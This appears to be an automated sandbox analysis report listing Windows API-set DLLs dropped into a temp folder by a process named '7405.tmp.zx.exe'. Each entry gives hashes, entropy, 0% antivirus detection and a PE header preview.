                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......S.....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20760
                                                                                                                                                                                                                                                  Entropy (8bit):7.026463196608447
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:UWWEhWsxlQpBj0HRN7l1khQHRN7kTPSIlexA:1DqWl1kh8kL62
                                                                                                                                                                                                                                                  MD5:1322690996CF4B2B7275A7950BAD9856
                                                                                                                                                                                                                                                  SHA1:502E05ED81E3629EA3ED26EE84A4E7C07F663735
                                                                                                                                                                                                                                                  SHA-256:5660030EE4C18B1610FB9F46E66F44D3FC1CF714ECCE235525F08F627B3738D7
                                                                                                                                                                                                                                                  SHA-512:7EDC06BFA9E633351291B449B283659E5DD9E706DD57ADE354BCE3AF55DF4842491AF27C7721B2ACC6948078BDFC8E9736FEC46E0641AF368D419C7ED6AEBD44
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......G.....`.........................................`...G............ ...................A..............8............................................................................rdata..h...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processthreads-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):21784
                                                                                                                                                                                                                                                  Entropy (8bit):7.053725357941814
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:5WXk1JzNcKSImWEhW1qEQpBj0HRN77S4QHRN7j8AXOVlTHxE:5bcKSdkHqW+48j/cE
                                                                                                                                                                                                                                                  MD5:95612A8A419C61480B670D6767E72D09
                                                                                                                                                                                                                                                  SHA1:3B94D1745AFF6AAFEFF87FED7F23E45473F9AFC9
                                                                                                                                                                                                                                                  SHA-256:6781071119D66757EFA996317167904697216AD72D7C031AF4337138A61258D4
                                                                                                                                                                                                                                                  SHA-512:570F15C2C5AA599332DD4CFB3C90DA0DD565CA9053ECF1C2C05316A7F623615DD153497E93B38DF94971C8ABF2E25BC1AAAF3311F1CDA432F2670B32C767012A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20248
                                                                                                                                                                                                                                                  Entropy (8bit):7.060875826104053
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:iDfIeAWEhWY6yQpBj0HRN7wHQHRN7NjZSIlexL:NemTqWC8NV6d
                                                                                                                                                                                                                                                  MD5:D6AD0F2652460F428C0E8FC40B6F6115
                                                                                                                                                                                                                                                  SHA1:1A5152871ABC5CF3D4868A218DE665105563775E
                                                                                                                                                                                                                                                  SHA-256:4EF09FA6510EEEBB4855B6F197B20A7A27B56368C63CC8A3D1014FA4231AB93A
                                                                                                                                                                                                                                                  SHA-512:CEAFEEE932919BC002B111D6D67B7C249C85D30DA35DFBCEBD1F37DB51E506AC161E4EE047FF8F7BF0D08DA6A7F8B97E802224920BD058F8E790E6FA0EE48B22
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......@!....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-profile-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):19224
                                                                                                                                                                                                                                                  Entropy (8bit):7.1376464003004685
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:tnjFPWEhWcCTQW65FdQpBjSdHnhWgN7a8Wc//W65FdQHnhWgN7a8WOR5mzVEMqnL:tnhWEhWnqQpBj0HRN7hQHRN7mCMll5i
                                                                                                                                                                                                                                                  MD5:654D95515AB099639F2739685CB35977
                                                                                                                                                                                                                                                  SHA1:9951854A5CF407051CE6CD44767BFD9BD5C4B0CC
                                                                                                                                                                                                                                                  SHA-256:C4868E4CEBDF86126377A45BD829D88449B4AA031C9B1C05EDC47D6D395949D4
                                                                                                                                                                                                                                                  SHA-512:9C9DD64A3AD1136BA62CCA14FC27574FAAEBC3DE1E371A86B83599260424A966DFD813991A5EF0B2342E0401CB99CE83CD82C19FCAE73C7DECDB92BAC1FB58A8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......N.....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20248
                                                                                                                                                                                                                                                  Entropy (8bit):7.038577027863076
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:QGeVdWEhWF4+QpBj0HRN7nKQHRN7KFcR8pUclXi:QGeVFp+qWK8AG8pUh
                                                                                                                                                                                                                                                  MD5:E6B7681CCC718DDB69C48ABE8709FDD6
                                                                                                                                                                                                                                                  SHA1:A518B705746B2C6276F56A2F1C996360B837D548
                                                                                                                                                                                                                                                  SHA-256:4B532729988224FE5D98056CD94FC3E8B4BA496519F461EF5D9D0FF9D9402D4B
                                                                                                                                                                                                                                                  SHA-512:89B20AFFAA23E674543F0F2E9B0A8B3ECD9A8A095E19D50E11C52CB205DAFDBF2672892FD35B1C45F16E78AE9B61525DE67DBE7673F8CA450AA8C42FEEAC0895
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......2....`.........................................`................ ...................A..............8............................................................................rdata..,...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-string-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):19736
                                                                                                                                                                                                                                                  Entropy (8bit):7.087741938037833
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:nyMvfWEhWtJ7QpBj0HRN7n0QHRN7gTtAXOVlTF2:nyMvPq7qWn08gWd
                                                                                                                                                                                                                                                  MD5:BCB412464F01467F1066E94085957F42
                                                                                                                                                                                                                                                  SHA1:716C11B5D759D59DBFEC116874E382D69F9A25B6
                                                                                                                                                                                                                                                  SHA-256:F040B6E07935B67599EA7E32859A3E93DB37FF4195B28B4451AD0D274DB6330E
                                                                                                                                                                                                                                                  SHA-512:79EC0C5EE21680843C8B7F22DA3155B7607D5BE269F8A51056CC5F060AD3A48CED3B6829117262ABA1A90E692374B59DDFE92105D14179F631EFC0C863BFDECB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......#j....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-synch-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):21784
                                                                                                                                                                                                                                                  Entropy (8bit):7.005386895286503
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:Ddv3V0dfpkXc0vVaEWEhWYYxnhLvQpBj0HRN7gPZGQHRN7xuHNiWXhlhOY3:Ddv3VqpkXc0vVaS5ahLvqWSA8sNizM
                                                                                                                                                                                                                                                  MD5:B98598657162DE8FBC1536568F1E5A4F
                                                                                                                                                                                                                                                  SHA1:F7C020220025101638FD690D86C53D895A03E53C
                                                                                                                                                                                                                                                  SHA-256:F596C72BE43DB3A722B7C7A0FD3A4D5AEA68267003986FBFD278702AF88EFA74
                                                                                                                                                                                                                                                  SHA-512:AD5F46A3F4F6E64A5DCB85C328F1B8DAEFA94FC33F59922328FDCFEDC04A8759F16A1A839027F74B7D7016406C20AC47569277620D6B909E09999021B669A0D6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`...V............ ...................A..............8............................................................................rdata..l...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-synch-l1-2-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20248
                                                                                                                                                                                                                                                  Entropy (8bit):7.091480115020503
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:ntZ3lWEhWFJ7QpBj0HRN7DdC8QHRN7cSIlexF:pa7qWDdC88c6H
                                                                                                                                                                                                                                                  MD5:B751571148923D943F828A1DEB459E24
                                                                                                                                                                                                                                                  SHA1:D4160404C2AA6AEAF3492738F5A6CE476A0584A6
                                                                                                                                                                                                                                                  SHA-256:B394B1142D060322048FB6A8AC6281E4576C0E37BE8DA772BC970F352DD22A20
                                                                                                                                                                                                                                                  SHA-512:26E252FF0C01E1E398EBDDCC5683A58CDD139161F2B63B65BDE6C3E943E85C0820B24486859C2C597AF6189DE38CA7FE6FA700975BE0650CB53C791CD2481C9D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......?.....`.........................................`...v............ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-sysinfo-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20760
                                                                                                                                                                                                                                                  Entropy (8bit):7.031246620579023
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:rB2WEhWC5oQpBj0HRN7xQHRN7sbSIlexe:rBs1aqWx8868
                                                                                                                                                                                                                                                  MD5:8AEA681E0E2B9ABBF73A924003247DBB
                                                                                                                                                                                                                                                  SHA1:5BAFC2E0A3906723F9B12834B054E6F44D7FF49F
                                                                                                                                                                                                                                                  SHA-256:286068A999FE179EE91B289360DD76E89365900B130A50E8651A9B7ECE80B36D
                                                                                                                                                                                                                                                  SHA-512:08C83A729036C94148D9A5CBC03647FA2ADEA4FBA1BBB514C06F85CA804EEFBF36C909CB6EDC1171DA8D4D5E4389E15E52571BAA6987D1F1353377F509E269AB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0.......5....`.........................................`...E............ ...................A..............8............................................................................rdata..\...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-timezone-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):19736
                                                                                                                                                                                                                                                  Entropy (8bit):7.126809628880692
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:DPWEhWcG6SJxHW65FdQpBjSdHnhWgN7a8Wcb8W65FdQHnhWgN7a8Wbv8p2kacqnd:LWEhWP6yQpBj0HRN7reQHRN7c8pUclXM
                                                                                                                                                                                                                                                  MD5:EAB486E4719B916CAD05D64CD4E72E43
                                                                                                                                                                                                                                                  SHA1:876C256FB2AEB0B25A63C9EE87D79B7A3C157EAD
                                                                                                                                                                                                                                                  SHA-256:05FE96FAA8429992520451F4317FBCEBA1B17716FA2CAF44DDC92EDE88CE509D
                                                                                                                                                                                                                                                  SHA-512:C50C3E656CC28A2F4F6377BA24D126BDC248A3125DCA490994F8CACE0A4903E23346AE937BB5B0A333F7D39ECE42665AE44FDE2FD5600873489F3982151A0F5D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-util-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):19736
                                                                                                                                                                                                                                                  Entropy (8bit):7.050436266578937
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:VPWEhWcAQIqyW65FdQpBjSdHnhWgN7a8Wcx/YaWW65FdQHnhWgN7a8Wu08p2kacE:dWEhWxqEQpBj0HRN7FwQHRN7k8pUclXS
                                                                                                                                                                                                                                                  MD5:EDD61FF85D75794DC92877F793A2CEF6
                                                                                                                                                                                                                                                  SHA1:DE9F1738FC8BF2D19AA202E34512EC24C1CCB635
                                                                                                                                                                                                                                                  SHA-256:8ACA888849E9089A3A56FA867B16B071951693AB886843CFB61BD7A5B08A1ECE
                                                                                                                                                                                                                                                  SHA-512:6CEF9B256CDCA1A401971CA5706ADF395961B2D3407C1FFF23E6C16F7E2CE6D85D946843A53532848FCC087C18009C08F651C6EB38112778A2B4B33E8C64796C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......k....`.........................................`...9............ ...................A..............8............................................................................rdata..L...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-conio-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20760
                                                                                                                                                                                                                                                  Entropy (8bit):7.043213792651867
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:0N+WEhW+FQpBj0HRN7N7rJQHRN7YSIlexs:ZjqW1rJ8Y6e
                                                                                                                                                                                                                                                  MD5:22BFE210B767A667B0F3ED692A536E4E
                                                                                                                                                                                                                                                  SHA1:88E0FF9C141D8484B5E34EAAA5E4BE0B414B8ADF
                                                                                                                                                                                                                                                  SHA-256:F1A2499CC238E52D69C63A43D1E61847CF852173FE95C155056CFBD2CB76ABC3
                                                                                                                                                                                                                                                  SHA-512:CBEA3C690049A73B1A713A2183FF15D13B09982F8DD128546FD3DB264AF4252CCD390021DEE54435F06827450DA4BD388BD6FF11B084C0B43D50B181C928FD25
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......i....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-convert-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):23832
                                                                                                                                                                                                                                                  Entropy (8bit):6.893758159434215
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:ODyuWEhWjlQpBj0HRN7ubJlUQHRN7sXhlhOq:qMqWuzU8lq
                                                                                                                                                                                                                                                  MD5:DA5E087677C8EBBC0062EAC758DFED49
                                                                                                                                                                                                                                                  SHA1:CA69D48EFA07090ACB7AE7C1608F61E8D26D3985
                                                                                                                                                                                                                                                  SHA-256:08A43A53A66D8ACB2E107E6FC71213CEDD180363055A2DC5081FE5A837940DCE
                                                                                                                                                                                                                                                  SHA-512:6262E9A0808D8F64E5F2DFAD5242CD307E2F5EAA78F0A768F325E65C98DB056C312D79F0B3E63C74E364AF913A832C1D90F4604FE26CC5FB05F3A5A661B12573
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................@............`.........................................`................0...................A..............8............................................................................rdata..............................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-environment-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20248
                                                                                                                                                                                                                                                  Entropy (8bit):7.034562111482961
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:I8PWEhWck+4cW65FdQpBjSdHnhWgN7a8Wcl4zKW65FdQHnhWgN7a8W5kX5mzVEMq:9WEhWi4+QpBj0HRN71/QHRN7ckwCMllO
                                                                                                                                                                                                                                                  MD5:33A0FE1943C5A325F93679D6E9237FEE
                                                                                                                                                                                                                                                  SHA1:737D2537D602308FC022DBC0C29AA607BCDEC702
                                                                                                                                                                                                                                                  SHA-256:5AF7AA065FFDBF98D139246E198601BFDE025D11A6C878201F4B99876D6C7EAC
                                                                                                                                                                                                                                                  SHA-512:CAB7FCAA305A9ACE1F1CC7077B97526BEBC0921ADF23273E74CD42D7FE99401D4F7EDE8ECB9847B6734A13760B9EBE4DBD2465A3DB3139ED232DBEF68FB62C54
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......y....`.........................................`..."............ ...................A..............8............................................................................rdata..<...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):21784
                                                                                                                                                                                                                                                  Entropy (8bit):7.046057210626605
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:h81nWm5CcWEhWke9HQpBj0HRN7KQhv2kQHRN7yAXOVlTnG:hOnWm5C6DMHqWKmuk8pb
                                                                                                                                                                                                                                                  MD5:633DCA52DA4EBAA6F4BF268822C6DC88
                                                                                                                                                                                                                                                  SHA1:1EBFC0F881CE338D2F66FCC3F9C1CBB94CDC067E
                                                                                                                                                                                                                                                  SHA-256:424FD5D3D3297A8AB1227007EF8DED5A4F194F24BD573A5211BE71937AA55D22
                                                                                                                                                                                                                                                  SHA-512:ED058525EE7B4CC7E12561C7D674C26759A4301322FF0B3239F3183911CE14993614E3199D8017B9BFDE25C8CB9AC0990D318BB19F3992624B39EC0F084A8DF1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......."....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-heap-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20760
                                                                                                                                                                                                                                                  Entropy (8bit):7.011889321604509
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:eQWEhWxFQpBj0HRN7o8/QHRN7/cPcSIlexP:eWGqWo8/8/l6B
                                                                                                                                                                                                                                                  MD5:43BF2037BFD3FB60E1FEDAC634C6F86E
                                                                                                                                                                                                                                                  SHA1:959EEBE41D905AD3AFA4254A52628EC13613CF70
                                                                                                                                                                                                                                                  SHA-256:735703C0597DA278AF8A6359FC051B9E657627F50AD5B486185C2EF328AD571B
                                                                                                                                                                                                                                                  SHA-512:7042846C009EFEA45CA5FAFDC08016ECA471A8C54486BA03F212ABBA47467F8744E9546C8F33214620F97DBCC994E3002788AD0DB65B86D8A3E4FF0D8A9D0D05
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..(...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-locale-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
